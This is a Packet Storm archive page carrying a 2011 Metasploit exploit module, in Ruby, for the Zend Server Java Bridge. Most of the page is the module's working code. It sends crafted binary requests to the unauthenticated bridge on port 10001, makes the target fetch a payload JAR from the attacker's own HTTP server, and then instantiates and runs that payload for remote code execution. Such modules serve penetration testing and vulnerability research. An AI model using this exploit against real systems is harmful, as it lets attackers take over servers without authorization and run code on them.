what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zend Server Java Bridge Arbitrary Java Code Execution

Zend Server Java Bridge Arbitrary Java Code Execution
Posted Apr 6, 2011
Authored by bannedit | Site metasploit.com

This Metasploit module takes advantage of a trust relationship issue within the Zend Server Java Bridge. The Java Bridge is responsible for handling interactions between PHP and Java code within Zend Server. When Java code is encountered Zend Server communicates with the Java Bridge. The Java Bridge then handles the java code and creates the objects within the Java Virtual Machine. This interaction however, does not require any sort of authentication. This leaves the JVM wide open to remote attackers. Sending specially crafted data to the Java Bridge results in the execution of arbitrary java code.

tags | exploit, java, remote, arbitrary, php
advisories | OSVDB-71420
SHA-256 | 0b7ab4865dc9886b7d46ce4b5433ed01d7157a9568397fc5d7d07dd4d712244f

Zend Server Java Bridge Arbitrary Java Code Execution

Change Mirror Download
##
# $Id: zend_java_bridge.rb 12242 2011-04-05 01:08:07Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Zend Server Java Bridge Arbitrary Java Code Execution',
'Description' => %q{
This module takes advantage of a trust relationship issue within the
Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
between PHP and Java code within Zend Server.

When Java code is encountered Zend Server communicates with the Java Bridge. The
Java Bridge then handles the java code and creates the objects within the Java Virtual
Machine. This interaction however, does not require any sort of authentication. This
leaves the JVM wide open to remote attackers. Sending specially crafted data to the
Java Bridge results in the execution of arbitrary java code.
},
'Author' => [ 'bannedit' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12242 $',
'References' =>
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/'],
[ 'URL', 'http://www.exploit-db.com/exploits/17078/' ],
],
'Platform' => ['java'], # win
'Arch' => ARCH_JAVA,
'Privileged' => true,
'Targets' =>
[
[ 'Linux', {}],
[ 'Windows', {}],
],
'DisclosureDate' => 'Mar 28 2011',
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(10001) ], self.class)
end

def exploit
start_service()
send_java_require
end

def send_java_require()
connect

jar = rand_text_alpha(rand(8)+1) + '.jar'
path = get_uri + '/' + jar
uri_len = path.length
java_require = [0xffffffff, 0x16000000].pack('V*') +
"setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
[uri_len].pack('C') + path

java_require = [java_require.length].pack('N') + java_require

print_status("Sending java_require() request... #{path}")
sock.put(java_require)
res = sock.get_once

select(nil, nil, nil, 5) # wait for the request to be handled
create_and_exec
end

def create_and_exec
print_status("Sending Final Java Bridge Requests")

create_obj =
[0x34000000, 0x00000000, 0x0c000000].pack('V*') +
"CreateObject" +
[0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
"metasploit.Payload" +
[0x07000000].pack('N') + [0x00].pack('C')

sock.put(create_obj)
res = sock.get_once
obj_id = res[5,4]

callmain =
[0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
[0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +
[0x00].pack('C') + [0x00].pack('C')

sock.put(callmain)
sock.get_once
handler()
end

def on_request_uri(cli, request)
if request.uri =~ /\.jar$/i
send_response(cli, payload.encoded,
{
'Content-Type' => 'application/java-archive',
'Connection' => 'close',
'Pragma' => 'no-cache'
})

print_status("Replied to Request for Payload JAR")
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close